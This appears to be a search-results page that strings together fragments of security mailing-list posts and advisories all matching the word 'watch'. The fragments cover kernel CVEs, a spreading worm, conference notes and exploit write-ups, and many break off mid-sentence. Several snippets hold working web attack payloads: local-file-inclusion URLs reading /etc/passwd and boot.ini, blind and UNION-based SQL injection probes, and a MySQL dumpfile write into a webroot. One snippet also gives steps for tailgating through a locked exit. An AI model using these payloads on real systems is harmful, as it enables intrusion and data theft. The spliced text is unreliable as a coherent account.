Next Page >>
watches
To be fair, the security industry is trying really hard to get good
metrics but proper metrics are also labor intensive, require counting,
and other types of math beyond the average, disinterested, and
disillusioned security employee. Yes, just as measuring time requires
being able to read a clock, good metrics currently requires reading
security and controls. Watch for more digital watch equivalents in
2009. Unfortunately, like digital watches, it still assure people get
there on time.
4. The vuln hunters are getting more and more afraid of the legal
instructive. Further information is available from the Windows Server
Group Policy Home
http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.
To watch a demonstration of this policy being applied to a Windows Server 2003
domain controller, see the link below.
http://www.youtube.com/watch?v=XRVI4iQ2Nug
To watch a demonstration of this policy being applied to a Windows Server 2008
when it does hold, traffic can be measured. True - it is weaker than the
global attack, but still...
Alternatively, and assuming non-uniform (section-wise) traffic, the
attacker can start with "scanning" the sections (e.g. connect to port 1
of the attacker's IP, watch for traffic, then connect to port 2, watch
for traffic, etc.) - within few thousand iterations (assuming
TABLE_LENGTH==1024), the section space will be almost completely
covered. And the attacker will have a good idea of where (i.e. in which
section(s)) the traffic is. Then the attacker only needs to monitor
those sections. This assume that the traffic pattern is time-wise
select 'hello i dont like you' into dumpfile '/bla/not_my_friend/www/index.html';
-> considering too that his www or some other folder is not properly chmoded
...as also in many many case .]
PHP offers the possibility to interact with mysql/&others
i think safemode/open_basedir should totally watch what's going to mysql
( like those "into outfile/dumpfile" , for sure "load_file" it's different,
but considering the fact that they build/integrate a "safemode" into PHP
then they should watch this kind of stuff.)
but once again .. i totally agree with your point,in a shared webhosting
~~~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../../../boot.ini%00
~~~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../etc/passwd%00
You can watch "Online Grades" exploits in action:
SQLi --> http://www.youtube.com/watch?v=PWYh5254I4c
Credentials Changer --> http://www.youtube.com/watch?v=BhHpLicPcC0
LFI/BSQLi --> http://www.youtube.com/watch?v=Mlpve19l6_o
LFI/BSQLi --> http://www.youtube.com/watch?v=6kt-NU98GXU
Andy Davis escribi:
> Personally I think these techniques are pretty cool we're really pleased
> with the results of the research - I think it may be clearer to everyone
> when we release the higher resolution videos that are easier to watch.
I think it may be clearer to everyone if you release some kind of paper
describing (and including) the shellcodes. Also a fully commented
lpd-cisco-remote-shell exploit would help since it would *demonstrate* the
whole exploitation process :-) No offense, videos are nice but at last they
are pure marketing, they *demonstrate* nothing.
OSSTMM soon gained the attention of governments from city to state to
national which is how it eventually got to the ISO. ISO is the acronym
of the International Standards Organization. Headquartered in Geneva,
Switzerland, ISO is the collection of people who create manuals
standardizing all sorts of things like paper sizes (ISO 216), what
determines a water-resistant watch (ISO 2281), how to properly conduct
quality management (ISO 9001), the C programming language (ISO 9899),
shoe sizes (ISO 9407), or what defines proper information security
(ISO 27001 and 27002). However they currently have nothing on
operational security, the means of assuring security for processes and
systems in action. The only way that can be done is by attacking it
software versions of the connected clients are copied in the relative
static buffers used for the visualization in the GUI through the
wcscpy function.
If this string is too long a crash will occur immediately or in some
cases (like on BitTorrent) could happen later or when the user watches
the status of another torrent or leaves the "Peers" window.
Code execution is not possible.
For exploiting the problem is enough that an external attacker connects
to the random port opened on the client and sends the long client
Bugs to Flaws - Evgeny Lebanidze
* Preventing SQL Injections in Online Applications: Study, Recommendations
and Java Solution Prototype Based on the SQL DOM - Etienne Janot and
Pavol Zavarsky
* Watch What You Write: Preventing Cross-Site Scripting by Observing
Program Output - Matias Madou, Edward Lee, Jacob West and Brian Chess
New for AppSec Europe: there is an expo with technical vendor demos and a
Capture the Flag event!
I've probably missed some stuff (and got some stuff wrong), but this summary
became way too long already and it's late. Feedback welcome!
[1] Dragos should post them soon here: http://www.eusecwest.com/
[2] Watch http://www.coresecurity.com/?module=ContentMod&action=news&id=papers
[3] Google "IOS rootkit" used to return the presentation below as first hit
"Cisco Router Forensics" - http://www.securite.org/presentations/secip/
[4] http://seclists.org/bugtraq/2007/Nov/0384.html
[5] http://www.phenoelit-us.org/ultimaratio/index.html
http://www.milw0rm.com/exploits/77
#
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
#
# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
It is obvious that benchmarking attacks can work against a huge number of softwares proceeding data
in such ways. But will you ask all developers to master time execution, memory allocation, I/O
operations in order to hide sensible and private data ? No, that's nonsense.
The main problem is that a process can access other process information just by watching its own
available environment. There is the major flaw: unprivileged process grabbing data on critical
process. A secured environment must be absolutely hermetic and then watch carefully what it
discloses to other users or process. Windows clearly fails on that point, as a badly protected
Linux does when anyone can read the command line typed by a user just by running a 'ps'.
Actually the library is divided in two branches: stable (3.8.3 released
in the far 2003) and devel (the current CVS).
Although the vulnerable instructions are located in both the versions
only the devel is exploitable because the ID3v2 4.0 tags are not
supported in the stable (watch ID3V2_LATEST in globals.h).
#######################################################################
======
Description:
Previous versions of the kernel package contain multiple
vulnerabilities. The inotify functionality may allow local
users to gain privileges via unknown vectors related to race
conditions in inotify watch removal and umount. Additionally,
there are two Denial of Services vulnerabilities, including one
in which a local user may cause a "soft" system lock-up.
This update requires a system reboot to implement the fixes.
I have revised the paper based on the comments, and put the revised version on the Pomcor site, at
http://www.pomcor.com/whitepapers/file_sharing_security.pdf
(Watch for a revision date of November 10, there was an earlier version.)
The changes include an improvement based on the last post by Bil Corry (see Section 5.1).
Thanks for the all the comments!
The scheme "mailto" is vulnerable if one takes as default mail client to GroupWise, the fault is to implement the scheme followed by an extensive argument and this causes the buffer overflow. This brings the consequence that can overwrite the EIP and is able to execute arbitrary code. The result with a debbuger us what reveals.
Access violation when executing [41414141]
What power is that vulnerability to attach a html file which is included in an iframe with the scheme badly formed runs only watch.
proof of concept
#!/usr/bin/python
Again my apologies if my asking this question in the wrong forum has
offended anyone.
And many thanks to anyone who responds.
--------------------------------------------------------
Don't miss season 2 of Tori & Dean: Inn Love, Tuesdays at 10pm/9 C premiering August 14th, only on Oxygen! Watch Season 1: www.shedidwhat.tv
--------------------------------------------------------
This e-mail is property of Oxygen Media, LLC. It is intended only for the person or entity to which it is addressed and may contain information that is privileged, confidential, or otherwise protected from disclosure. Distribution or copying of this e-mail or the information contained herein by anyone other than the intended recipient is prohibited. If you have received this e-mail in error, please notify me immediately and destroy all electronic and paper copies of this e-mail.
byte modification removes access control to the VTY and the second
privilege escalates to Level 15.
Personally I think these techniques are pretty cool we're really pleased
with the results of the research - I think it may be clearer to everyone
when we release the higher resolution videos that are easier to watch.
Cheers,
Andy
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
#
# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
Hugo Dias discovered that the ATM subsystem did not correctly manage
socket counts. A local attacker could exploit this to cause a system hang,
leading to a denial of service. (CVE-2008-5079)
It was discovered that the inotify subsystem contained watch removal
race conditions. A local attacker could exploit this to crash the system,
leading to a denial of service. (CVE-2008-5182)
Dann Frazier discovered that in certain situations sendmsg did not
correctly release allocated memory. A local attacker could exploit
>
____________________________________________________________________________________
Catch up on fall's hot new shows on Yahoo! TV. Watch previews, get listings, and more!
http://tv.yahoo.com/collections/3658
> OSSTMM soon gained the attention of governments from city to state to
> national which is how it eventually got to the ISO. ISO is the acronym
> of the International Standards Organization. Headquartered in Geneva,
> Switzerland, ISO is the collection of people who create manuals
> standardizing all sorts of things like paper sizes (ISO 216), what
> determines a water-resistant watch (ISO 2281), how to properly conduct
> quality management (ISO 9001), the C programming language (ISO 9899),
> shoe sizes (ISO 9407), or what defines proper information security (ISO
> 27001 and 27002). However they currently have nothing on operational
> security, the means of assuring security for processes and systems in
> action. The only way that can be done is by attacking it every way
[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
-------------
WATCH VIDEO:
-------------
SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo
I am constantly updating on this on my twitter account to avoid
list clutter:
http://twitter.com/gadievron
You can watch the infection live on a web counter from the hosting
provider that the worm points to. This thing is fast-spreading.
Gadi.
==========
- WebLogic administrators can be trained not to browse other web pages
while logged in to the Administration Console. However, since some
hyperlinks in the console point to servers on the Internet (e.g.,
http://support.bea.com) the attacker could watch the administrator's
Internet traffic and detect such requests as a strong sign that the
administrator is currently logged in to the Administration Console. She
would then slightly modify the Internet server's response so as to include
the malicious code. Such an attack could only be mounted by attackers
capable of monitoring and modifying the administrator's Internet traffic
http://www.theage.com.au/news/technology/flaw-leaves-microsoft-looking-like-a-turkey/2007/11/23/1195975914416.html
Which is where Beau says there are ~160,000 exploitable machines in NZ alone.
He would *supposedly* know since he has the wpad.co.nz domain.
Whether it is a major issue or not, misconfigurations happens, heck, shit
happens. I'd think we should watch for this and get that domain
registered/monitored at different ccTLDs.
Gadi.
Exploitation
============
First identify the exit point that you want to exploit. Stand at a
safe distance during a high-traffic time and watch for people to use
the exit point. Time how long it takes for the door to close and
lock itself when someone traverses the exit point.
Next, identify a safe hiding place near the exit point, preferably
in a direction that would be behind a person exiting the door, but
On 10/12/07, Roman Medina-Heigl Hernandez wrote:
> Andy Davis escribi:
> > Personally I think these techniques are pretty cool we're really pleased
> > with the results of the research - I think it may be clearer to everyone
> > when we release the higher resolution videos that are easier to watch.
>
> I think it may be clearer to everyone if you release some kind of paper
> describing (and including) the shellcodes. Also a fully commented
> lpd-cisco-remote-shell exploit would help since it would *demonstrate* the
> whole exploitation process :-) No offense, videos are nice but at last they
Just two:
1. You should know what you are talking about :)
2. You will need to submit a video recording of your entire talk before
the deadline. This will ensure that participants have something to watch
in case there is a last minute technical issue or some other problem.
These videos will be made available absolutely free to everyone a week
after the conference.
I spoke with DirectNIC last night and the Registrar Operations (reg-ops)
mailing list was updated that the domain is no longer reachable. That was
very fast response time from DirectNIC, which we appreciate.
The worm is still fast-spreading, watch the statistics as they fly:
http://www.d9.pl/system/stats.php
The facebook security team is working on this, and they are quite capable.
The security operations community has been doing analysis and
take-downs, but the worm seems to still be spreading.
Next Page>>
|
